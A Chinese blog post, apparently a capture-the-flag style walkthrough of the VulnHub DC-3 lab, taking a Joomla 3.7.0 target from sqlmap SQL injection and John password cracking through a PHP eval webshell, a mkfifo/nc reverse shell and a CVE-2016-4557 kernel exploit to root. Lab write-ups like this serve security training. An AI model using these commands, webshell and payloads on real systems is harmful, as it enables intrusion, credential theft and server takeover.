DC-3靶机详细过程

已于 2024-10-14 19:33:07 修改
阅读量1.2k 收藏 28
点赞数 32
文章标签: ci/cd
于 2024-09-30 23:32:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84706939/article/details/142636411
版权

一,环境搭建

我们需要一台kali,一台dc-3靶机

 靶机DC-3下载地址:

 https : //download.vulnhub.com/dc/DC-3.zip

将靶机DC-3与Kali都以NAT模式连接到网络

DC-3需要多修改一些东西 点击CD/DVD 在点击高级,把IDE里面的内容改成IDE 0:0 点击确定。

都完成后开启KALI与DC-3

21c3a5cffb3e4027ba6568ee73733014.png

二、渗透靶场

查看靶场IP 输入ifconfig点击回车可以看到自己的IP

7af4ae2e130c4dd3a18f22bbb2dcc700.png

  1. 目标搭建的靶场,靶场IP为:192.168.186.0/24

  2. 1.信息收集 

查看本机IP和目标靶机ip

使用nmap扫描工具 输入nmap -sP 192.168.186.0/24网段,查找存活主机

扫描到DC-3靶机的IP地址为:192.168.186.131

kali的IP地址为:192.168.186.128

34f5a68d667745d4a569798c28c7c600.png

192.168.186.1 vm8网卡

192.168.186.2 网关

192.168.186.131 靶机

192.168.186.254 DHCP服务器

192.168.186.128 kali本机

2.探端口以及服务

输入nmap  -A  -p- -v 192.168.186.131

c6fb103cd9a347bcba76ce82d33cfaeb.png

可以看到80端口是开放的,存在web服务,Apache/2.4.18

3.网页信息探测

使用火狐打开网页 输入靶机IP地址 访问网址http://192.168.186.131

3478787aa011471b9f34a6ae5eaec61c.png

页面显示必须获得权限

4.joomScan扫描

这里介绍一个新工具joomscan,

joomscan是一款开源的且针对joomla的扫描器,kali可以用命令apt install joomscan安装该工具,输入apt install joomscan进行安装,选择y安装

ab20b38ba21d4b2ab1e7fec1e8b8dce2.png

5.漏洞查找

joomscan

输入 joomscan --url http://192.168.186.131

0f7cee9ebccb4591b1626fe0e778a27f.png

得到joomla版本信息   版本为3.7.0 也得到了网站后台地址

 http://192.168.186.131/administrator/

在火狐页面搜索得到的后台地址 

aa42ffc430e64f068d430ce65c851df7.png

6.利用nikto扫描获取后台地址

Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。

输入nikto --url http://192.168.186.131/

8d46af08e59a4b87ad288bb3ba9f6962.png

    searchsploit

前面知道joomla,版本为3.7.0

使用searchsploit检查到有对应的漏洞

输入searchsploit joomla 3.7.0

587aef8669b74f1f94e57ae5a4ad08d6.png

我们发现有一个SQL注入,还存在一个XSS

我们可以看一下这个漏洞的提示信息

输入 searchsploit -m 42033.txt

62e4f3bf218d4fbf948bdbadd29f69a8.png

输入cat 42033.txt   信息如图所示

1e37b3f6c44242e6ae9eb940ae2debdf.png

把localhost修改为我们的靶机IP,到火狐页面去访问

http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%22

看到提示: 您的SQL语法有错误;说明进行了拼接,存在SQL注入

21ea967ec61342e6b632a31e85f1e5aa.png

7.漏洞利用

sqlmap

1.跑出所有数据库

输入sqlmap -u 

“http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”--risk=3 --level=5 --random-agent --dbs -p list[fullordering] –batch(注:双引号里的内容是火狐搜索栏里的内容)

09482c0f08f246dead95da1118d3177d.png

跑出来的数据库如下图:

b0848b60bef5416e9f8c3bf500857803.png

2.获取当前数据库的名字joomladb

输入sqlmap -u 

“http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”--risk=3 --level=5 --random-agent --dbs -p list[fullordering]  --current-db –batch

dc9975200fbb4ae2ae7d4aecd662f42c.png

3.获取joomladb的users表

输入 sqlmap -u

"http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables --batch

2068d77e08c346a689edaccd4b084f3e.png

我们需要关注的是#__users这张表

4.获取joomladb的users表的字段名

sqlmap -u

"http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns

第一个选项是y

75ee1934b01e426fa31e36e0d93dfa87.png

第二个输入y

1ab2bb35562a41ee9539c88ba684f81c.png

第三个随便输入

8e1fa9d0ad274dd0839dc97b9c351006.png

第四个输入10

7bbdf2fcf3ef4fa09ca859c7f7409576.png成功跑出六个字段

335bd100ff044b9f88c4a6b9dec9f9d3.png

5.获取目标字段username和password

sqlmap -u "http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump --batch

获得一个用户名和加密的密码 结果如下图:

6a26cca499f54f28b67d77504b23aef5.png

John

利用john爆破密码snoopy

先创建一个1.txt,把加密的密码字段写入

输入echo ‘$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu’ > 1.txt  在输入cat 1.txt 就写进去了

a2426460423f4d4eb5c3c414826a5a09.png7.使用john破解出admin密码

输入John 1.txt    如图所知密码是snoopy

91f7a67470934aff8fa9555ccee8ea74.png

8.利用获取到的账号密码进行登录

在火狐网页搜索上输入http://192.168.186.131/administrator/ 出现登录页面 

账号是admin 密码是snoopy

cfb60bb64a8e4e07a96ee8b3c11b70b9.png

8.上传webshell

点击Extensions,然后弹出一个框,滑倒倒数第二个,点击最后一个。

48107cbdafa44f149f0972ee34e39759.png

进入页面,再点击Beez3 Details and Files

426e803f0d9f41789d011714935bb4f2.png

然后点击页面中的new files

f8ce1acc1cc34c2ba3eae2f3b6a02224.png

点击到这里发现可以上传文件,我们先要找到当前文件所在的目录:红色框住的复制

c4f587fdc0e343f88376d78f239c71a0.png

火狐上输入  http://192.168.186.131/templates/beez3/html/(粘贴刚刚复制的)点击回车显示目录

bcac22b8dab14f86a1b13d7662afc0f6.png

回到刚才的页面 点击new file
在点击html 旁边有两个小框创建一个php文件,名字叫做shell 点击create创建成功

255e4f7e5c1d4bd1aff6423b6dabeded.png

创建成功后,会跳到编辑页面,然后我们输入php一句话,点击左上角绿色的save进行保存

<?php

echo ("密码是a");

@eval($_REQUEST [a]);

?>

91d9848696524203ad265f1099399396.png

在火狐上再次访问http://192.168.186.131/templates/beez3/html/
会发现多了一个shell.php文件,我们访问一下

4934c6ae8d0a4e2a888931cc5de77feb.png

访问webshell,得到我们设置的会先内容,文件上传成功

http://192.168.186.131/templates/beez3/html/shell.php

06a1eb55392c4cfaa9db4cab241ac0d6.png

    

9.蚁剑

管理webshell

    打开蚁剑右键添加数据,地址填写http://192.168.186.131/templates/beez3/html/shell.php

密码填写 a 然后点击测试链接 右下角会显示连接成功

93a8fd980438469f9d5e3a4241405696.png

点击添加 在刚刚添加的数据上右键进入虚拟终端执行whoami查询我权限,是www-data权限

c6313ce0fe064133b2af9643674d1588.png

反弹shell到kali

输入nc -lvvp 1234

bbfe5ecea9ed4a4fb04b6c29abb2f931.png

靶机连接  输入

nc -e /bin/bash 192.168.186.128 1234

页面显示-e参数不可用

824208631b3c40499a9194ebc3da49cd.png

使用如下目录连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.186.128 1234 >/tmp/f

9f82b5cd163740928cdadab45cd7bd5e.png

a777999dc78f4a5aa837f0af66df4ecf.png

交互式shell

 常用的就是python创建交互式shell

 接着输入     python3 -c 'import pty; pty.spawn("/bin/bash")'  点击回车,在输入ls

e85b83400e864fbdaebee503b21d594b.png

10.使用辅助脚本发现提权漏洞

下载辅助脚本Linux-Exploit-Suggester.sh

    下载地址:

https://github.com/mzet-/linux-exploit-suggester

上传脚本,直接在蚁剑里上传,点击右键,选择上传文件,选择刚刚下好的脚本,点击打开上传成功

              724420fbe039412ab7d5b286dc53dba1.png

8fa6d06a13744195a3fec1c350be167c.png0b65b6ff2f9a425e839de8de1be57947.png

输入ls点击回车,发现漏洞   ls -l linux-exploit-suggester.sh

aa019b8a0ed64ee0948914d263549ff1.png

发现没有执行权限,我们给他加个执行文件

输入 chmod +x linux-exploit-suggester.sh

880f8e535f8d41cebe8abe15be0aa780.png

执行脚本      输入./linux-exploit-suggester.sh

发现很多可利用漏洞

7799c5096b99477bb31b189a7946f6fa.png3544b984a8f047c3a5cb7e48c7c9c012.png

11.提权

上面发现了很多漏洞,这里我们挑一个进行提权

挑选CVE-2016-4557

b2f5b63a9b694c408021498bddbab790.png

在图片里可以看到是一个39772的文件,由于给出的那个URL无法下载

去searchsploit里面去看看 

进入root里,输入searchsploit -m 39772.zip

b3644574e6fe4ffc8424952b02ba5f7b.png

1e9d4e5c41444ec684770931800e9ce7.png地址跟上面一样也是不能使用的,可以用下面这个地址直接下载。

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/39772.zip

下载好以后,点击蚁剑右键上传文件

b34ac061878a42fda3081fc155685c07.png

提权

    解压文件

输入ls 点击回车,在输入unzip 39772.zip

c89f237e292f4409a7275d121959a4c3.png

cd 39772

ls

f2fb90c56aa44e299be552a52c42192e.png

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

af6514da6c4d449b9435110f47a921ae.png

输入ls点击回车

输入./compile.sh 点击回车

输入./doubleput.c点击回车

输入ls点击回车

在输入./doubleput点击回车

执行完如下图,提权成功

4eba6a0eb6c84c8c897ddf08d310e898.png

获得root权限

输入whoami点击回车如下图

a3936c6c141f48ddaec864fae0a81703.png

12.发现the-flag.txt

输入cd /root

ls

cat the-flag.txt

97cd3343046840e482d213d89b6637ab.png

完成!

 

 

 

 

 

 

 

生产蜂蜜的小熊
关注
DC-3靶机详细渗透过程
MRS_jianai的博客
11-30 863
dc-3靶机详细渗透教程
DC-3靶机
mlws1900的博客
03-23 785
下载不下来的可以用迅雷输入上面的网址进行下载。
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1950
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
dc-3靶机渗透
tmyzxy1314的博客
07-04 974
dc-3靶机下载链接:启动靶机遇到的问题解决文章在下面kali最新版 dc-3靶机 两台机器都在vmware上运行 网络设置NAT模式。
DC-4靶机详细渗透过程
MRS_jianai的博客
11-30 634
dc4靶机渗透教程
DC-3靶机渗透详细流程
braty_的博客
01-24 810
DC-3 靶机渗透详细流程
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 856
DC-6靶机详细渗透过程
DC-5靶机详细渗透过程
MRS_jianai的博客
12-21 555
DC-5靶机详细渗透过程
DC-3靶机渗透
weixin_45349299的博客
01-02 613
title: DC-3靶机渗透详解tags: DC系列靶机categories: 学习笔记。
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2549
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-9渗透详细过程DC系列完结)
IerkeU的博客
03-28 3826
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 2003
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
DC-3靶机 3000字复现过程
镜湖
02-04 536
DC-3的渗透测试 一、下载地址: DC-3的下载地址 DC-3的靶机介绍:这次的靶机没有提醒,全程需要自己去思考。 二、步骤: 1.探测靶机的信息 1)使用netdiscover -i eth0来探测靶机的IP地址,如图1-1所示。之后使用nmap 来探测网页的开放端口,使用***nmap -T4 -A 192.168.41.143 -p- -oN nmap136.A*** ,如图1-2所示。 图 1-1 靶机的IP地址 图 1-2 探测开放端口 2)知道靶机有开放的80端口,我们尝试去访问网页,发现
Python 自动化运维:CI/CD与DevOps实践的深度探讨
weixin_52392194的博客
10-30 1144
CD则是在CI的基础上,实现代码的自动化部署,将代码变更快速且安全地推送到生产环境。通过上述流程的实施,CI/CD不仅可以显著提高代码的交付速度,还能提升代码的稳定性和可靠性。通过使用Jenkins,开发者可以在各个阶段定义不同的步骤,以适应复杂的构建和部署需求。Docker是现代应用开发和运维中的核心技术之一,通过将应用及其所有依赖打包成容器,实现了轻量级和可移植的应用部署方式。Pod是Kubernetes中最小的部署单位,一个Pod可以包含一个或多个容器,这些容器共享相同的网络命名空间和存储。
uicc.hci.service的理解
Krysdong
10-28 324
i : getHCIservice 调用并实现serviceimp,并记录appid。二、uicc.hci.serviced的三个包。
HTB:Cicada[WriteUP]
如有错误感谢斧正
10-31 576
将输出写入res.txt文件中,并提取端口号存入变量ports。将该输出保存到users.txt文件中,再将所有用户名进行提取。可以看到有两个user.txt文件,两个都查看内容发现是一样的。密码:Cicada$M6Corpb*@Lp#nZp!密码:Cicada$M6Corpb*@Lp#nZp!使用上文拿到的密码对靶机账户进行密码喷洒。账户:michael.wrightson。账户:david.orelious。密码:aRt$Lp#7t*VQ!账户:emily.oscars。
【MySQL系列】理解 `utf8mb4` 和 `utf8mb4_unicode_ci`
檀越的博客
11-01 922
字符集定义了数据库可以存储的字符集合,而校对规则则定义了如何比较这些字符。在 MySQL 等数据库系统中,utf8mb4是一种常用的字符集,它支持存储任意 Unicode 字符,包括表情符号等。utf8mb4是utf8的超集,可以存储更多的字符,因此成为存储国际化数据的首选。校对规则(collation)则定义了字符比较的规则,包括大小写敏感性、重音符号的处理等。是一个常见的校对规则,其中的ci后缀代表“case-insensitive”,即不区分大小写。这意味着在比较时,A和a会被视为相同。
自动化测试类型与持续集成频率的关系
最新发布
chengxuyuznguoke的博客
11-01 216
这种频繁的集成,要求在自动化测试执行之前,只有少量的代码改动过,以争取测试能100%通过。顾名思义,每天集成就是每天开发工作结束时进行的集成,这时的测试类型可以是执行那些需要花费一些时间进行且不能持续执行的测试。每次迭代集成,是在一次迭代开发完成之后进行,这时候的软件可能已经准备发布,需要执行的测试类型也将会是面向发布的系统测试。一般来说,持续集成有3种常见的集成频率,分别是每分钟集成、每天集成和每迭代集成。项目组应当以怎样的频率进行集成,这取决于测试策略,也取决于项目组快速集成的能力。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放...以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值